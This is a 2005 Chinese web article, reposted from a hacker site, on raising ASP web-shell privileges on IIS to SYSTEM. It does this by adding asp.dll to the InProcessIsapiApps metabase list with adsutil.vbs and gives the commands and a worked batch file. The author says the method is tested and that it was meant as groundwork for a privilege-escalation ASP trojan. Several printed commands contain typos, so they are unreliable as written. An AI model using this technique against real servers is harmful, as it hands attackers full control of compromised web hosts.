将asp权限提到最高__网络安全频道

当前位置：eNet硅谷动力 > 网络安全频道 > Asp/PHP

将asp权限提到最高

2005-02-01 14:34 来源：黑鹰基地 [收藏到E起摘]

【编者按】
　　　　本来是要写个提权asp木马的，可惜时间不是太多功底也不是太深。先把原理方法告诉大家好了。简单说说，说的太麻烦没有必要。懂了就行。

　　本来是要写个提权asp木马的，可惜时间不是太多功底也不是太深。先把原理方法告诉大家好了。简单说说，说的太麻烦没有必要。懂了就行。

　　原理：

　　asp文件的教本解释是由asp.dll运行的。由dllhost.exe启动的。身分是IWAN_NAME。若是把asp.dll放到inprocesslsapiapps中那它就是由inetifo.exe直接启动。身份是system

　　方法：

　　第一步。

　　得到inprocesslsapiapps内容，用命令“cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"。将得到的一组dll复制下来。

　　第二步

　　写一个bat内容为“cscript C:\Inetpub\AdminScripts\adsutil vbs set w3svc/inprpocessisapiapps "C:\Inetpub\AdminScripts\asp.dll" ·····

　　省略号为复制下的内容。中间用空格分开不要带回车符

　　最后运行这个bat就行了。

　　例如：

　　我用“cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps”得到

　　"c:\winnt\system32\inetsrv\httpext.dll"

　　"c:\winnt\system32\inetsrv\httpodbc.dll"

　　"C:\WINNT\system32\inetsrv\ssinc.dll"

　　"C:\WINNT\System32\msw3prt.dll"

　　"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\40\isapi\_vti_aut\author.dll"

　　"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\40\isapi\_vti_adm\admin.dll"

　　"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\40\isapi\shtml.dll"　　

　　那么你的bat就应该是：　

　　cscript C:\Inetpub\AdminScripts\adsutil vbs set w3svc/inprpocessisapiapps "C:\Inetpub\AdminScripts\asp.dll" "c:\winnt\system32\inetsrv\httpext.dll" "c:\winnt\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\System32\msw3prt.dll" "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\40\isapi\_vti_aut\author.dll" "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\40\isapi\_vti_adm\admin.dll" "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\40\isapi\shtml.dll"　

　　已测试成功！！

　　

【责任编辑李旭海】


投稿信箱：	内容合作：010—65245588—3137

　

　信息化手册

·	专家教你QQ聊天防盗五大绝
·	校园网如何部署GSN全局安
·	什么是CIO？
·	浅谈CRM系统应用中的四大
·	架构、构件、组件、框架、
·	DSM领域定义建模和MDA模型
·	企业信息化管理“新领域”
·	软件测试步骤介绍
·	影响软件测试效率的因素
·	软件测试的基本原则

　信息化查询

应用分类：

重点项目

ERP CRM 电子政务 HR 无线网络安全服务器存储 VoIP 智能卡视频会议
财务管理远程教育网络建设

重点行业

电信金融证券广电政府
服装石化汽车邮政
制造业房地产医疗商业
宾馆旅游教育民航工商税务公安电力保险仓储海关人事其它

【对此感兴趣】【到论坛发表评论】【 E-mail给朋友】【回频道首页】【关闭窗口】

专
题
回
顾

垃圾邮件
何时不再来

宽待接入方式
一览

DDos
攻击分析与防御

政府采购
打开节能绿色通道

新媒体梦想
照进手机电视的现实

从选型到实施
全面解析CRM

信息化优秀案例

2005 信息化最具影响力品牌
——思科政府网络安全解决方案

2005 物流行业专业服务奖
——金蝶物流服务行业解决方案

2005 制造行业最佳项目实施奖
——神州数码PDM系统应用案例

2005 教育信息化优秀服务商
——NEC校园网络建设成功案例

1、蠕虫Win32/Pipown注入winlogon.

2、病毒Win32/Seresp改变URL 妨碍用

3、“泽拉丁变种JR”发送垃圾邮件让

4、“QQ通行证变种YRV”窃取用户QQ

5、蠕虫Win32.Looked.KP定期下载运

6、冒充“超级兔子” 突破QQ软键盘

7、自动运行木马下载器变种YTZ通过

8、“杀软禁闭者204800”改系统时间

9、微软承认Excel 2007存在漏洞不

10、Cisco Unified MeetingPlace跨站

精彩文章推荐

1、手机辐射标准有望今年年内出台

2、上海有线互动电视计划明年推广

3、中电华通:运营3.5GHz的机遇来临

4、夺三项目 WAPI联盟完成产业布局

5、专家称：要警惕WCDMA势力封杀TD

6、大唐电信投入13亿元担保豪赌3G

7、把握用户需求是IPTV成功的关键

8、美宽带市场落后于世界先进水平

9、黄金周用手机WAP可订购小额保险

10、互联网改变了电信业的游戏规则

eNet商城促销

AP与Gateway双模支持WDS及POE供电

48个10/100Mbps快速以太网端口

GPRS上网卡；最高传送速度85.6Kbp

极具性价比防火墙中小企业最佳选择

热门关键字：笔记本 | 手机 | 笔记本电脑 | 数码 | 数码相机 | 服务器| 主板 | CPU | 音箱 | 显示器 | 一体机 | 服务器 | 信息化 | 解决方案 | 游戏

关于eNet | 广告服务 | 版权声明 | 加入eNet | 联系我们 | 建议/投诉 | 网站导航 | 加入收藏

网站合作、内容监督、商务咨询、投诉建议：010-65245588
合作建议：hezuo@mail.enet.com.cn
Copyright © 1998--2008 硅谷动力公司版权所有京ICP证000044号